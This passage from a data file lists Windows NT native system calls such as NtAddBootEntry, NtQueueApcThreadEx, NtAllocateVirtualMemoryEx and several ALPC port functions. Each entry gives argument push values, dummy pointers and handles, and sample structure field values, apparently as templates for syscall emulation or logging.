"fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": { "ntFunc": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "pushes": [ { "value": "0xbadd01d0", "additionalComment": "Pointer to BOOLEAN GenerateOnClose (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00" }, { "value": "0xbadd01e0", "additionalComment": "Pointer to NTSTATUS ReturnStatus (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd01f0", "additionalComment": "Pointer to ACCESS_MASK GrantedAccess (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00", "additionalComment": "BOOLEAN ObjectCreation (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0200", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct8", "structureValueExpectations": "GenericRead, GenericWrite, GenericExecute, GenericAll masks.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG ObjectTypeListLength (single object type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0210", "additionalComment": "Pointer to OBJECT_TYPE_LIST (dummy pointer)", "structurePointer": "OBJECT_TYPE_LIST", "structureRef": "struct9", "structureValueExpectations": "Level, Sbz, Type pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (no flags set)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "AUDIT_EVENT_TYPE AuditType (ObjectAccess)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020019", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0220", "additionalComment": "Pointer to SID PrincipalSelfSid (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x01020300" }, { "value": "0xbadd0230", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct10", "structureValueExpectations": "Revision, Control, Owner, Group, SACL, DACL.", "pointedValue": None }, { "value": "0xbadd0240", "additionalComment": "Pointer to UNICODE_STRING ObjectName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct11", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None }, { "value": "0xbadd0250", "additionalComment": "Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct12", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ClientToken (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0260", "additionalComment": "Pointer to HandleId (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0270", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct13", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None } ], "structures": { "struct8": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct9": { "type": "OBJECT_TYPE_LIST", "fields": [ { "fieldName": "Level", "fieldType": "WORD", "fieldValue": "0x0001", "fieldComment": "Object type level" }, { "fieldName": "Sbz", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Reserved" }, { "fieldName": "Type", "fieldType": "POINTER", "fieldValue": "0xbadd0300", "fieldComment": "Pointer to object type GUID (dummy pointer)" } ] }, "struct10": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "BYTE", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "WORD", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd0310", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd0320", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd0330", "fieldComment": "Pointer to DACL (dummy pointer)" } ] }, "struct11": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0340", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct12": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0012", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0022", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0350", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct13": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0024", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0360", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtAddAtomEx": { "ntFunc": "NtAddAtomEx", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to RTL_ATOM (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000000C", "additionalComment": "Length of AtomName in bytes (example: 12 bytes for 'TestAtom')", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to AtomName (PWSTR, dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1000" } ], "structures": {} }, "NtAddBootEntry": { "ntFunc": "NtAddBootEntry", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to BOOT_ENTRY (dummy pointer)", "structurePointer": "BOOT_ENTRY", "structureRef": "struct14", "structureValueExpectations": "Boot entry structure with identifier, attributes, and file path.", "pointedValue": None } ], "structures": { "struct14": { "type": "BOOT_ENTRY", "fields": [ { "fieldName": "Version", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Version 1" }, { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000100", "fieldComment": "Size of BOOT_ENTRY" }, { "fieldName": "Id", "fieldType": "ULONG", "fieldValue": "0x00000010", "fieldComment": "Boot entry identifier" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Active attribute" }, { "fieldName": "FriendlyNameOffset", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "Offset to friendly name" }, { "fieldName": "BootFilePathOffset", "fieldType": "ULONG", "fieldValue": "0x00000080", "fieldComment": "Offset to boot file path" } ] } } }, "NtAddDriverEntry": { "ntFunc": "NtAddDriverEntry", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to EFI_DRIVER_ENTRY (dummy pointer)", "structurePointer": "EFI_DRIVER_ENTRY", "structureRef": "struct15", "structureValueExpectations": "EFI driver entry structure with version, attributes, and file path.", "pointedValue": None } ], "structures": { "struct15": { "type": "EFI_DRIVER_ENTRY", "fields": [ { "fieldName": "Version", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Version 1" }, { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000080", "fieldComment": "Size of EFI_DRIVER_ENTRY" }, { "fieldName": "Id", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "Driver entry identifier" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Active attribute" }, { "fieldName": "FriendlyNameOffset", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Offset to friendly name" }, { "fieldName": "DriverFilePathOffset", "fieldType": "ULONG", "fieldValue": "0x00000050", "fieldComment": "Offset to driver file path" } ] } } }, "NtAdjustTokenClaimsAndDeviceGroups": { "ntFunc": "NtAdjustTokenClaimsAndDeviceGroups", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to ULONG (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to ULONG (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_GROUPS PreviousDeviceGroups (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DeviceGroupsBufferLength (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DeviceBufferLength (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "UserBufferLength (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_GROUPS NewDeviceGroupsState (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState (optional, None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00", "additionalComment": "DeviceGroupsResetToDefault (BOOLEAN, FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00", "additionalComment": "DeviceResetToDefault (BOOLEAN, FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00", "additionalComment": "UserResetToDefault (BOOLEAN, FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlertThreadByThreadId": { "ntFunc": "NtAlertThreadByThreadId", "pushes": [ { "value": "0x00001234", "additionalComment": "Thread ID (example: 0x1234)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateReserveObject": { "ntFunc": "NtAllocateReserveObject", "pushes": [ { "value": "0x00000001", "additionalComment": "MEMORY_RESERVE_TYPE Type (MemoryReserveObject)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed reserve objects)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE MemoryReserveHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000444" } ], "structures": {} }, "NtGetNextProcess": { "ntFunc": "NtGetNextProcess", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE NewProcessHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "ULONG Flags (0, typical for default enumeration)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000040", "additionalComment": "ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "ACCESS_MASK DesiredAccess (PROCESS_QUERY_LIMITED_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, start from None for first call)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetNextThread": { "ntFunc": "NtGetNextThread", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE NewThreadHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "ULONG Flags (0, typical for default enumeration)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000040", "additionalComment": "ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "ACCESS_MASK DesiredAccess (THREAD_QUERY_LIMITED_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE ThreadHandle (None for first thread enumeration)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, process whose threads are being enumerated)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueueApcThreadEx": { "ntFunc": "NtQueueApcThreadEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID ApcArgument3 (None, typical for unused argument)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcArgument2 (None, typical for unused argument)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcArgument1 (None, typical for unused argument)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PPS_APC_ROUTINE ApcRoutine (dummy function pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE UserApcReserveHandle (None, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ThreadHandle (dummy handle, target thread)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtUmsThreadYield": { "ntFunc": "NtUmsThreadYield", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID SchedulerParam (None, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateUserPhysicalPages": { "ntFunc": "NtAllocateUserPhysicalPages", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG_PTR UserPfnArray (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG_PTR NumberOfPages (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateVirtualMemoryEx": { "ntFunc": "NtAllocateVirtualMemoryEx", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG ExtendedParameterCount (example: 2 parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)", "structurePointer": "MEM_EXTENDED_PARAMETER", "structureRef": "struct16", "structureValueExpectations": "Array of MEM_EXTENDED_PARAMETER structures describing extended allocation options.", "pointedValue": None }, { "value": "0x00000040", "additionalComment": "ULONG PageProtection (PAGE_EXECUTE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG AllocationType (MEM_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to SIZE_T RegionSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00020000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct16": { "type": "MEM_EXTENDED_PARAMETER", "fields": [ { "fieldName": "Type", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "MEM_EXTENDED_PARAMETER_TYPE" }, { "fieldName": "Reserved", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Reserved, must be zero" }, { "fieldName": "ULong64", "fieldType": "ULONG64", "fieldValue": "0x0000000000000001", "fieldComment": "Sample value for extended parameter" } ] } } }, "NtAlpcAcceptConnectPort": { "ntFunc": "NtAlpcAcceptConnectPort", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN AcceptConnection (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to ALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes (dummy pointer)", "structurePointer": "ALPC_MESSAGE_ATTRIBUTES", "structureRef": "struct17", "structureValueExpectations": "Attributes for the connection message.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to PORT_MESSAGE ConnectionRequest (dummy pointer)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct18", "structureValueExpectations": "PORT_MESSAGE structure describing the connection request.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to PortContext (dummy pointer, context value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0080", "additionalComment": "Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)", "structurePointer": "ALPC_PORT_ATTRIBUTES", "structureRef": "struct19", "structureValueExpectations": "Attributes for the new port.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct20", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ConnectionPortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct17": { "type": "ALPC_MESSAGE_ATTRIBUTES", "fields": [ { "fieldName": "AllocatedAttributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample attribute flag" }, { "fieldName": "ValidAttributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample valid attribute" } ] }, "struct18": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Message length" }, { "fieldName": "u1.ZeroInit", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero-initialized" }, { "fieldName": "u2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type" }, { "fieldName": "u2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "No data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99994444", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample message ID" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] }, "struct19": { "type": "ALPC_PORT_ATTRIBUTES", "fields": [ { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample flag" }, { "fieldName": "SecurityQos.Length", "fieldType": "ULONG", "fieldValue": "0x0000000C", "fieldComment": "SECURITY_QUALITY_OF_SERVICE length" }, { "fieldName": "MaxMessageLength", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "4KB max message" }, { "fieldName": "MemoryBandwidth", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxPoolUsage", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxViewSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxTotalSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" } ] }, "struct20": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtAlpcCancelMessage": { "ntFunc": "NtAlpcCancelMessage", "pushes": [ { "value": "0xbadd00b0", "additionalComment": "Pointer to ALPC_CONTEXT_ATTRIBUTES MessageContext (dummy pointer)", "structurePointer": "ALPC_CONTEXT_ATTRIBUTES", "structureRef": "struct21", "structureValueExpectations": "Context attributes for the message.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct21": { "type": "ALPC_CONTEXT_ATTRIBUTES", "fields": [ { "fieldName": "AttributeFlags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample context attribute" } ] } } }, "NtAlpcCreatePort": { "ntFunc": "NtAlpcCreatePort", "pushes": [ { "value": "0xbadd00c0", "additionalComment": "Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)", "structurePointer": "ALPC_PORT_ATTRIBUTES", "structureRef": "struct22", "structureValueExpectations": "Attributes for the new port.", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct23", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct22": { "type": "ALPC_PORT_ATTRIBUTES", "fields": [ { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample flag" }, { "fieldName": "SecurityQos.Length", "fieldType": "ULONG", "fieldValue": "0x0000000C", "fieldComment": "SECURITY_QUALITY_OF_SERVICE length" }, { "fieldName": "MaxMessageLength", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "4KB max message" }, { "fieldName": "MemoryBandwidth", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxPoolUsage", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxViewSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxTotalSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" } ] }, "struct23": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtAlpcCreatePortSection": { "ntFunc": "NtAlpcCreatePortSection", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ActualSectionSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE AlpcSectionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00020000", "additionalComment": "ULONG SectionSize (128 KB typical section size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default, no flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcCreateResourceReserve": { "ntFunc": "NtAlpcCreateResourceReserve", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE ResourceID (dummy pointer)", 